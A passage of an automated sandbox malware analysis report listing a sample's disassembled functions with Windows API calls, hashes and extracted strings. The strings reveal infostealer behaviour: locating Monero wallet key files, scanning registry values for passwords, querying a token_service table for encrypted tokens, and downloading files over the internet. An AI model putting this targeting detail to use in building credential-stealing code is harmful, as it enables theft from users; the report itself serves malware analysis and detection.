                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00641465
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                                • Part of subcall function 006499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006499EC
                                • Part of subcall function 006499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00649A11
                                • Part of subcall function 006499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00649A31
                                • Part of subcall function 006499C0: ReadFile.KERNEL32(000000FF,?,00000000,0064148F,00000000), ref: 00649A5A
                                • Part of subcall function 006499C0: LocalFree.KERNEL32(0064148F), ref: 00649A90
                                • Part of subcall function 006499C0: CloseHandle.KERNEL32(000000FF), ref: 00649A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 006414EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: 6bd2689cb703dc4a87fc0d3a83df0ac54d43954d3a06ea6423277b1e8aa4309a
                              • Instruction ID: ce20b22ee23c3f266468bb4f37285b9a04ebe643dbc360564a79531f4090f1d3
                              • Opcode Fuzzy Hash: 6bd2689cb703dc4a87fc0d3a83df0ac54d43954d3a06ea6423277b1e8aa4309a
                              • Instruction Fuzzy Hash: E15144B1D5011857DB55FBA0DD92BED733DAF54301F4042ACBA0A62091EE306B89CBAA
                              Function 006475D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 006472D0: memset.MSVCRT ref: 00647314
                                • Part of subcall function 006472D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0064733A
                                • Part of subcall function 006472D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006473B1
                                • Part of subcall function 006472D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0064740D
                                • Part of subcall function 006472D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00647452
                                • Part of subcall function 006472D0: HeapFree.KERNEL32(00000000), ref: 00647459
                              • lstrcat.KERNEL32(00000000,006617FC), ref: 00647606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00647648
                              • lstrcat.KERNEL32(00000000, : ), ref: 0064765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0064768F
                              • lstrcat.KERNEL32(00000000,00661804), ref: 006476A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 006476D3
                              • lstrcat.KERNEL32(00000000,00661808), ref: 006476ED
                              • task.LIBCPMTD ref: 006476FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                              • String ID: :
                              • API String ID: 3191641157-3653984579
                              • Opcode ID: 2c895c9e59fafb553fe4bc32691a5c2a6bf7d2aec74cf0a3dde15e1048a75df6
                              • Instruction ID: 8bfaca4711a7d95f1dec117ab7664a7ca1a5a92d6427fc6b3346652aef480b45
                              • Opcode Fuzzy Hash: 2c895c9e59fafb553fe4bc32691a5c2a6bf7d2aec74cf0a3dde15e1048a75df6
                              • Instruction Fuzzy Hash: 70314C71900109DFDB48EBB8DC95DFF777ABB54302B14411EF102A7291EB34A946CBA5
                              Function 006472D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 00647314
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0064733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006473B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0064740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00647452
                              • HeapFree.KERNEL32(00000000), ref: 00647459
                              • task.LIBCPMTD ref: 00647555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuememsettask
                              • String ID: Password
                              • API String ID: 2808661185-3434357891
                              • Opcode ID: 5e7cea246933253e7d67e6ca528cf6eeef728427747cd79c5fd9ddbf3a7d0bce
                              • Instruction ID: f4973c3eca1675d2d49cf1285bafdebd17f6a7c1b0c4e2ddce9f78949048b72e
                              • Opcode Fuzzy Hash: 5e7cea246933253e7d67e6ca528cf6eeef728427747cd79c5fd9ddbf3a7d0bce
                              • Instruction Fuzzy Hash: 3F610AB59141689BDB24DB50CC45BEAB7B9BF44300F0081E9E689A7241DFB06BC9CFA5
                              Function 00658100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,013DE370,00000000,?,00660E2C,00000000,?,00000000), ref: 00658130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00658137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00658158
                              • __aulldiv.LIBCMT ref: 00658172
                              • __aulldiv.LIBCMT ref: 00658180
                              • wsprintfA.USER32 ref: 006581AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: 283a9d65c73e60b5df84d14e7c9d74a1e40d52a8b59f8c3eb02b9d886006f6ab
                              • Instruction ID: d2adb8efcdc48f951e7da7e5ea65af23443fe7f7167fbce041d853005e59a68e
                              • Opcode Fuzzy Hash: 283a9d65c73e60b5df84d14e7c9d74a1e40d52a8b59f8c3eb02b9d886006f6ab
                              • Instruction Fuzzy Hash: FD2129B1A44208ABEB14DFD8CC49FAEB7B9FB44B41F104119F605BB2C0D77859058BA5
                              Function 006460A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                                • Part of subcall function 006447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00644839
                                • Part of subcall function 006447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00644849
                              • InternetOpenA.WININET(00660DF7,00000001,00000000,00000000,00000000), ref: 0064610F
                              • StrCmpCA.SHLWAPI(?,013DEC50), ref: 00646147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0064618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006461B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 006461DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0064620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00646249
                              • InternetCloseHandle.WININET(?), ref: 00646253
                              • InternetCloseHandle.WININET(00000000), ref: 00646260
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: c95f987b79a3800dd673700d2f5ab7508940f6cba9d8023b2427c1419baef7d8
                              • Instruction ID: 4267c4199240c6029ea43ea4b31062bb5248237363ed4058d172a911e495ae83
                              • Opcode Fuzzy Hash: c95f987b79a3800dd673700d2f5ab7508940f6cba9d8023b2427c1419baef7d8
                              • Instruction Fuzzy Hash: 385183B1900208ABEB24DFA4DC45BEE77B9FB44701F108199B605A71C0DBB46B89CF96
                              Function 0064BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                              • lstrlen.KERNEL32(00000000), ref: 0064BC9F
                                • Part of subcall function 00658E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00658E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0064BCCD
                              • lstrlen.KERNEL32(00000000), ref: 0064BDA5
                              • lstrlen.KERNEL32(00000000), ref: 0064BDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 127b7ffcd6b3cd4b13a07055185187878b80591be7e1c2bb70c53a1da2a5e491
                              • Instruction ID: 7732a2acc79b5ca1c6730a6dc9c9a13d8ca1aa09a263a6c67cb6529626dbced6
                              • Opcode Fuzzy Hash: 127b7ffcd6b3cd4b13a07055185187878b80591be7e1c2bb70c53a1da2a5e491
                              • Instruction Fuzzy Hash: 2DB14E719101089BDB58FBE0CC96EEE733ABF54301F44425DF906A6191EF34AA4DCBA6
                              Function 00656770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 6c93357d750c06b101168a7d859c5720f8d24200a90f0e6abd3f3645191b1d7a
                              • Instruction ID: 1adea3629d74366bb9d8f805560d015d1e8a1bf9dc3815193d01b08d704ec721
                              • Opcode Fuzzy Hash: 6c93357d750c06b101168a7d859c5720f8d24200a90f0e6abd3f3645191b1d7a
                              • Instruction Fuzzy Hash: 77F03A3090420DEFE348AFE8E90976CBB70FB08703F04019AF649862D0D6784A41EB96
                              Function 00644FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00644FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00644FD1
                              • InternetOpenA.WININET(00660DDF,00000000,00000000,00000000,00000000), ref: 00644FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00645011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00645041
                              • InternetCloseHandle.WININET(?), ref: 006450B9
                              • InternetCloseHandle.WININET(?), ref: 006450C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 7126cd99ec158135a718f6f7b34df7d10f64b8945c9e35b7022505ee28c356a3
                              • Instruction ID: 7e961dbbb510ec13cae41b680f02d51469e6c69108d81baaa13d5d92a3decaf6
                              • Opcode Fuzzy Hash: 7126cd99ec158135a718f6f7b34df7d10f64b8945c9e35b7022505ee28c356a3
                              • Instruction Fuzzy Hash: AE3114B4A00218ABDB24DF54DC85BDDB7B5FB48704F5081E9EA09A7281C7706EC58F99
                              Function 006583DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00658426
                              • wsprintfA.USER32 ref: 00658459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0065847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0065848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00658499
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                              • RegQueryValueExA.ADVAPI32(00000000,013DE490,00000000,000F003F,?,00000400), ref: 006584EC
                              • lstrlen.KERNEL32(?), ref: 00658501
                              • RegQueryValueExA.ADVAPI32(00000000,013DE580,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00660B34), ref: 00658599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00658608
                              • RegCloseKey.ADVAPI32(00000000), ref: 0065861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 29b84d1efb5e92caea893c445c5b23d6e6838d67db31661e912aa2cb1a910e3c
                              • Instruction ID: dbdab64287e62e8d729b8fd6b56bbd19b42fe5a6b464b641e8cfea4e55fc561e
                              • Opcode Fuzzy Hash: 29b84d1efb5e92caea893c445c5b23d6e6838d67db31661e912aa2cb1a910e3c
                              • Instruction Fuzzy Hash: B2210A719002189FEB24DB54DC85FE9B3B9FB48701F00C599A609A6180DF71AA86CFE4
                              Function 00657690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006576A4
